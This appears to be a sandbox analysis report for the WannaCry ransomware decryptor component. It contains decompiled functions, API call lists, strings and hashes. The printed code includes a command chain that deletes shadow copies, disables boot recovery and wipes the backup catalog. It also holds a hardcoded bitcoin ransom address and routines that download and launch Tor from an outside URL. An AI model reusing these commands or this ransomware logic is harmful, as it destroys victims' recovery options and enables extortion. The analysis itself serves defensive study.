                                                      • Your message has been sent successfully!, xrefs: 0040851D
                                                      • 00000000.res, xrefs: 00408480
                                                      • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                                      • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                                      • API String ID: 1233543560-382338106
                                                      • Opcode ID: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                                      • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                                      • Opcode Fuzzy Hash: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                                      • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004064D0 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 256stringwindowtimeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 71%
                                                      			E004064D0(intOrPtr __ecx, void* __fp0) {
				char _v1032;
				char _v1424;
				void _v2256;
				void _v2456;
				void _v2707;
				char _v2708;
				intOrPtr _v2720;
				short _v2724;
				int _t48;
				int _t49;
				intOrPtr* _t50;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				short _t70;
				void* _t82;
				char* _t87;
				char* _t89;
				intOrPtr _t90;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t105;
				char _t122;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t142;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				void* _t165;
				void* _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t201;

				_t201 = __fp0;
				_t90 = __ecx; // executed
				L00412CB0(); // executed
				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
				_t48 = E00401C70(0);
				_t170 = _t169 + 4;
				if(_t48 == 0) {
					_t122 =  *0x421798; // 0x0
					_v2708 = _t122;
					memset( &_v2707, _t48, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetModuleFileNameA(0,  &_v2708, 0x104);
					_t87 = strrchr( &_v2708, 0x5c);
					_t170 = _t170 + 0x14;
					if(_t87 != 0) {
						_t89 = strrchr( &_v2708, 0x5c);
						_t170 = _t170 + 8;
						 *_t89 = 0;
					}
					SetCurrentDirectoryA( &_v2708);
				}
				_t167 = _t90 + 0x50c;
				_t49 = E00401A10(_t167, 1);
				_t171 = _t170 + 8;
				if(_t49 == 0) {
					memset(_t167, _t49, 0xc3 << 2);
					asm("repne scasb");
					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
					 *(_t90 + 0x588) = 0;
					__imp__time(0);
					 *(_t90 + 0x578) = _t82;
					E00401A10(_t167, 0);
					_t171 = _t171 + 0x30;
				}
				_t50 = E00402C40();
				__imp__#115(0x202,  &_v1424); // executed
				__imp____p___argc();
				if( *_t50 > 1) {
					_t168 = __imp____p___argv;
					_t140 = "fi";
					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
					while(1) {
						_t98 =  *_t161;
						_t60 = _t98;
						if(_t98 !=  *_t140) {
							break;
						}
						if(_t60 == 0) {
							L12:
							_t60 = 0;
						} else {
							_t136 =  *((intOrPtr*)(_t161 + 1));
							_t22 = _t140 + 1; // 0x31000069
							_t60 = _t136;
							if(_t136 !=  *_t22) {
								break;
							} else {
								_t161 = _t161 + 2;
								_t140 = _t140 + 2;
								if(_t60 != 0) {
									continue;
								} else {
									goto L12;
								}
							}
						}
						L14:
						if(_t60 == 0) {
							E00407F80(_t90);
							ExitProcess(0);
						}
						_t141 = "co";
						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
						while(1) {
							_t99 =  *_t162;
							_t63 = _t99;
							if(_t99 !=  *_t141) {
								break;
							}
							if(_t63 == 0) {
								L21:
								_t63 = 0;
							} else {
								_t135 =  *((intOrPtr*)(_t162 + 1));
								_t25 = _t141 + 1; // 0x6600006f
								_t63 = _t135;
								if(_t135 !=  *_t25) {
									break;
								} else {
									_t162 = _t162 + 2;
									_t141 = _t141 + 2;
									if(_t63 != 0) {
										continue;
									} else {
										goto L21;
									}
								}
							}
							L23:
							if(_t63 == 0) {
								E004080C0(_t90);
								ExitProcess(0);
							}
							_t142 = "vs";
							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
							while(1) {
								_t100 =  *_t163;
								_t66 = _t100;
								if(_t100 !=  *_t142) {
									break;
								}
								if(_t66 == 0) {
									L30:
									_t66 = 0;
								} else {
									_t134 =  *((intOrPtr*)(_t163 + 1));
									_t28 = _t142 + 1; // 0x63000073
									_t66 = _t134;
									if(_t134 !=  *_t28) {
										break;
									} else {
										_t163 = _t163 + 2;
										_t142 = _t142 + 2;
										if(_t66 != 0) {
											continue;
										} else {
											goto L30;
										}
									}
								}
								L32:
								if(_t66 == 0) {
									Sleep(0x2710);
									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
									_t70 = "cmd.exe"; // 0x2e646d63
									_t105 =  *0x420fd4; // 0x657865
									_v2724 = _t70;
									_v2720 = _t105;
									if(E00401BB0() != 0) {
										_push( &_v2456);
										_push( &_v2724);
										sprintf( &_v1032, "%s %s");
										E00401A90( &_v1032, 0, 0);
									} else {
										E00401B50( &_v2724,  &_v2456, _t71);
									}
									ExitProcess(0);
								}
								goto L37;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L32;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L23;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L14;
				}
				L37:
				E00407E80();
				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0");
				E00406F80(_t90, _t201);
				E00406C20(_t90);
				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0);
				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0);
				 *0x42189c = _t90;
				return 1;
			}











































                                                      0x004064d0
                                                      0x004064da
                                                      0x004064dc
                                                      0x004064f9
                                                      0x0040650d
                                                      0x00406511
                                                      0x00406516
                                                      0x0040651b
                                                      0x0040651d
                                                      0x00406527
                                                      0x00406530
                                                      0x00406532
                                                      0x00406540
                                                      0x00406541
                                                      0x00406554
                                                      0x00406556
                                                      0x0040655b
                                                      0x00406564
                                                      0x00406566
                                                      0x00406569
                                                      0x00406569
                                                      0x00406571
                                                      0x00406571
                                                      0x00406577
                                                      0x00406580
                                                      0x00406585
                                                      0x0040658a
                                                      0x00406593
                                                      0x0040659d
                                                      0x004065ab
                                                      0x004065bb
                                                      0x004065bd
                                                      0x004065c7
                                                      0x004065d1
                                                      0x004065da
                                                      0x004065e0
                                                      0x004065e5
                                                      0x004065e5
                                                      0x004065e8
                                                      0x004065fa
                                                      0x00406600
                                                      0x00406609
                                                      0x0040660f
                                                      0x00406615
                                                      0x0040661e
                                                      0x00406621
                                                      0x00406621
                                                      0x00406625
                                                      0x00406629
                                                      0x00000000
                                                      0x00000000
                                                      0x0040662d
                                                      0x00406645
                                                      0x00406645
                                                      0x0040662f
                                                      0x0040662f
                                                      0x00406632
                                                      0x00406635
                                                      0x00406639
                                                      0x00000000
                                                      0x0040663b
                                                      0x0040663b
                                                      0x0040663e
                                                      0x00406643
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406643
                                                      0x00406639
                                                      0x0040664e
                                                      0x00406650
                                                      0x00406654
                                                      0x0040665b
                                                      0x0040665b
                                                      0x00406661
                                                      0x0040666a
                                                      0x0040666d
                                                      0x0040666d
                                                      0x00406671
                                                      0x00406675
                                                      0x00000000
                                                      0x00000000
                                                      0x00406679
                                                      0x00406691
                                                      0x00406691
                                                      0x0040667b
                                                      0x0040667b
                                                      0x0040667e
                                                      0x00406681
                                                      0x00406685
                                                      0x00000000
                                                      0x00406687
                                                      0x00406687
                                                      0x0040668a
                                                      0x0040668f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040668f
                                                      0x00406685
                                                      0x0040669a
                                                      0x0040669c
                                                      0x004066a0
                                                      0x004066a7
                                                      0x004066a7
                                                      0x004066ad
                                                      0x004066b6
                                                      0x004066b9
                                                      0x004066b9
                                                      0x004066bd
                                                      0x004066c1
                                                      0x00000000
                                                      0x00000000
                                                      0x004066c5
                                                      0x004066dd
                                                      0x004066dd
                                                      0x004066c7
                                                      0x004066c7
                                                      0x004066ca
                                                      0x004066cd
                                                      0x004066d1
                                                      0x00000000
                                                      0x004066d3
                                                      0x004066d3
                                                      0x004066d6
                                                      0x004066db
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004066db
                                                      0x004066d1
                                                      0x004066e6
                                                      0x004066e8
                                                      0x004066f3
                                                      0x0040671a
                                                      0x0040671c
                                                      0x00406721
                                                      0x00406727
                                                      0x0040672b
                                                      0x00406736
                                                      0x0040675b
                                                      0x0040675c
                                                      0x0040676a
                                                      0x0040677c
                                                      0x00406738
                                                      0x00406746
                                                      0x0040674b
                                                      0x00406786
                                                      0x00406786
                                                      0x00000000
                                                      0x004066e8
                                                      0x004066e1
                                                      0x004066e3
                                                      0x00000000
                                                      0x004066e3
                                                      0x00406695
                                                      0x00406697
                                                      0x00000000
                                                      0x00406697
                                                      0x00406649
                                                      0x0040664b
                                                      0x00000000
                                                      0x0040664b
                                                      0x0040678c
                                                      0x0040678e
                                                      0x0040679c
                                                      0x004067a4
                                                      0x004067ab
                                                      0x004067c6
                                                      0x004067d8
                                                      0x004067dc
                                                      0x004067ef

                                                      APIs
                                                      • #4710.MFC42 ref: 004064DC
                                                      • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                                      • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                                        • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                                        • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                        • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                        • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                        • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                                      • strrchr.MSVCRT ref: 00406554
                                                      • strrchr.MSVCRT ref: 00406564
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                                      • time.MSVCRT ref: 004065D1
                                                      • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                                      • __p___argv.MSVCRT ref: 0040661A
                                                      • ExitProcess.KERNEL32 ref: 0040665B
                                                      • __p___argv.MSVCRT ref: 00406666
                                                      • ExitProcess.KERNEL32 ref: 004066A7
                                                      • __p___argv.MSVCRT ref: 004066B2
                                                      • Sleep.KERNEL32(00002710), ref: 004066F3
                                                      • sprintf.MSVCRT ref: 0040676A
                                                      • ExitProcess.KERNEL32 ref: 00406786
                                                      • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                                      • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                                      Strings
                                                      • Wana Decrypt0r 2.0, xrefs: 00406796
                                                      • %s %s, xrefs: 00406764
                                                      • cmd.exe, xrefs: 0040671C
                                                      • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                                      • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                                      • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                                      • API String ID: 623806192-606506946
                                                      • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                                      • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004060E0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 139windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 84%
                                                      			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				struct HINSTANCE__* _t82;
				struct HICON__* _t83;
				intOrPtr _t119;
				intOrPtr _t124;

				_push(0xffffffff);
				_push(E00413E0B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				_push(__ecx);
				_t119 = __ecx;
				_push(_a4);
				_push(0x66);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
				_v12 = 2;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
				_v12 = 3;
				E004085C0(__ecx + 0x120);
				_v12 = 4;
				E004085C0(__ecx + 0x1a4);
				_v12 = 5;
				E00404090(__ecx + 0x228);
				_v12 = 6;
				E00404090(__ecx + 0x290);
				_v12 = 7;
				E00404090(__ecx + 0x2f8);
				_v12 = 8;
				E00404090(__ecx + 0x360);
				_v12 = 9;
				E00405000(__ecx + 0x3c8);
				_v12 = 0xa;
				E00405000(__ecx + 0x444);
				_v12 = 0xb;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
				_v12 = 0xc;
				L00412DA6();
				_v12 = 0xd;
				L00412DA6();
				_v12 = 0xe;
				L00412DA6();
				_v12 = 0xf;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x834)) = 0;
				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x844)) = 0;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x854)) = 0;
				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x864)) = 0;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x874)) = 0;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x884)) = 0;
				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
				_v12 = 0x1b;
				_t82 = E00407640(__ecx + 0x888);
				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
				 *((intOrPtr*)(__ecx + 0x894)) = 0;
				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
				_push(0x421798);
				_v12 = 0x1d;
				 *((intOrPtr*)(__ecx)) = 0x4163a0;
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				L00412E5A();
				_push(0x80);
				_push(0xe);
				L00412F2C();
				_t83 = LoadIconA(_t82, 0x80); // executed
				_push(0x421798);
				 *(_t119 + 0x82c) = _t83;
				 *((intOrPtr*)(_t119 + 0x824)) = 0;
				 *((intOrPtr*)(_t119 + 0x828)) = 0;
				 *((intOrPtr*)(_t119 + 0x818)) = 0;
				L00412DA0();
				 *((intOrPtr*)(_t119 + 0x820)) = 0;
				 *[fs:0x0] = _v44;
				return _t119;
			}










                                                      0x004060e0
                                                      0x004060e2
                                                      0x004060ed
                                                      0x004060ee
                                                      0x004060f5
                                                      0x004060fe
                                                      0x00406100
                                                      0x00406101
                                                      0x00406103
                                                      0x00406107
                                                      0x00406113
                                                      0x00406117
                                                      0x0040611c
                                                      0x00406128
                                                      0x0040612f
                                                      0x00406134
                                                      0x00406140
                                                      0x00406147
                                                      0x0040614c
                                                      0x00406158
                                                      0x0040615d
                                                      0x00406168
                                                      0x0040616d
                                                      0x00406178
                                                      0x0040617d
                                                      0x00406188
                                                      0x0040618d
                                                      0x00406198
                                                      0x0040619d
                                                      0x004061a8
                                                      0x004061ad
                                                      0x004061b8
                                                      0x004061bd
                                                      0x004061c8
                                                      0x004061cd
                                                      0x004061d8
                                                      0x004061df
                                                      0x004061e4
                                                      0x004061f0
                                                      0x004061f7
                                                      0x00406202
                                                      0x00406209
                                                      0x00406214
                                                      0x00406219
                                                      0x00406224
                                                      0x00406229
                                                      0x00406233
                                                      0x00406239
                                                      0x0040623f
                                                      0x00406245
                                                      0x0040624b
                                                      0x00406251
                                                      0x00406257
                                                      0x0040625d
                                                      0x00406263
                                                      0x00406269
                                                      0x0040626f
                                                      0x00406275
                                                      0x0040627b
                                                      0x00406281
                                                      0x00406287
                                                      0x0040628d
                                                      0x00406293
                                                      0x00406299
                                                      0x0040629f
                                                      0x004062a5
                                                      0x004062ab
                                                      0x004062b1
                                                      0x004062c1
                                                      0x004062c6
                                                      0x004062cb
                                                      0x004062d5
                                                      0x004062db
                                                      0x004062e5
                                                      0x004062ec
                                                      0x004062f1
                                                      0x004062f7
                                                      0x004062fc
                                                      0x00406303
                                                      0x00406308
                                                      0x00406313
                                                      0x00406318
                                                      0x0040631d
                                                      0x00406322
                                                      0x00406329
                                                      0x0040632f
                                                      0x00406335
                                                      0x00406340
                                                      0x00406346
                                                      0x0040634c
                                                      0x00406352
                                                      0x00406358
                                                      0x00406361
                                                      0x0040636d
                                                      0x00406377

                                                      APIs
                                                      • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                      • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                      • #567.MFC42(00000066,00000000), ref: 0040612F
                                                      • #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                        • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                        • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                                        • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                                        • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                                        • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                        • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                                        • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                        • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                                        • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                                      • #567.MFC42(00000066,00000000), ref: 004061DF
                                                      • #540.MFC42(00000066,00000000), ref: 004061F7
                                                      • #540.MFC42(00000066,00000000), ref: 00406209
                                                      • #540.MFC42(00000066,00000000), ref: 00406219
                                                      • #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                                      • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                                      • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                                      • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                                      • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                                      • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                                      • #860.MFC42(00421798), ref: 00406358
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                                      • String ID: 0ZA$0ZA$0ZA$DZA
                                                      • API String ID: 3237077636-3729005435
                                                      • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                                      • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B840 Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 138synchronizationprocessfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 85%
                                                      			E0040B840() {
				void _v519;
				char _v520;
				void _v1039;
				char _v1040;
				struct _STARTUPINFOA _v1108;
				struct _PROCESS_INFORMATION _v1124;
				char _t29;
				long _t33;
				int _t37;
				void* _t46;
				char _t47;
				long _t51;
				void* _t55;
				void* _t56;
				void* _t84;
				void* _t86;

				_t29 =  *0x421798; // 0x0
				_v1040 = _t29;
				memset( &_v1039, 0, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
				_t84 =  &_v1124 + 0x20;
				_t33 = GetFileAttributesA( &_v1040); // executed
				if(_t33 != 0xffffffff) {
					L8:
					_v1108.cb = 0x44;
					_v1124.hProcess = 0;
					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
					_v1124.hThread = 0;
					_v1124.dwProcessId = 0;
					_v1124.dwThreadId = 0;
					_v1108.wShowWindow = 0;
					_v1108.dwFlags = 1;
					_t37 = CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124); // executed
					if(_t37 != 0) {
						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
							WaitForSingleObject(_v1124.hProcess, 0x7530);
						}
						CloseHandle(_v1124);
						CloseHandle(_v1124.hThread);
						return 1;
					} else {
						return 0;
					}
				} else {
					_t46 = E0040B6A0("TaskData", "s.wnry", 0);
					_t86 = _t84 + 0xc;
					if(_t46 != 0) {
						L5:
						_t47 =  *0x421798; // 0x0
						_v520 = _t47;
						memset( &_v519, 0, 0x81 << 2);
						asm("stosw");
						asm("stosb");
						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
						_t84 = _t86 + 0x20;
						_t51 = GetFileAttributesA( &_v520); // executed
						if(_t51 != 0xffffffff) {
							CopyFileA( &_v520,  &_v1040, 0); // executed
							goto L8;
						} else {
							return 0;
						}
					} else {
						_push(0);
						_t55 = E0040B780( &_v1040, "TaskData", "https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip");
						_t86 = _t86 + 0xc;
						if(_t55 != 0) {
							goto L5;
						} else {
							_push(0);
							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
							_t86 = _t86 + 0xc;
							if(_t56 != 0) {
								goto L5;
							} else {
								return _t56;
							}
						}
					}
				}
			}



















                                                      0x0040b846
                                                      0x0040b84d
                                                      0x0040b861
                                                      0x0040b863
                                                      0x0040b879
                                                      0x0040b87a
                                                      0x0040b885
                                                      0x0040b88d
                                                      0x0040b892
                                                      0x0040b95b
                                                      0x0040b966
                                                      0x0040b970
                                                      0x0040b974
                                                      0x0040b976
                                                      0x0040b982
                                                      0x0040b991
                                                      0x0040b995
                                                      0x0040b99f
                                                      0x0040b9aa
                                                      0x0040b9b2
                                                      0x0040b9d6
                                                      0x0040b9e2
                                                      0x0040b9e2
                                                      0x0040b9ef
                                                      0x0040b9f6
                                                      0x0040ba02
                                                      0x0040b9b5
                                                      0x0040b9be
                                                      0x0040b9be
                                                      0x0040b898
                                                      0x0040b8a4
                                                      0x0040b8a9
                                                      0x0040b8ae
                                                      0x0040b8e9
                                                      0x0040b8e9
                                                      0x0040b8f3
                                                      0x0040b908
                                                      0x0040b90a
                                                      0x0040b923
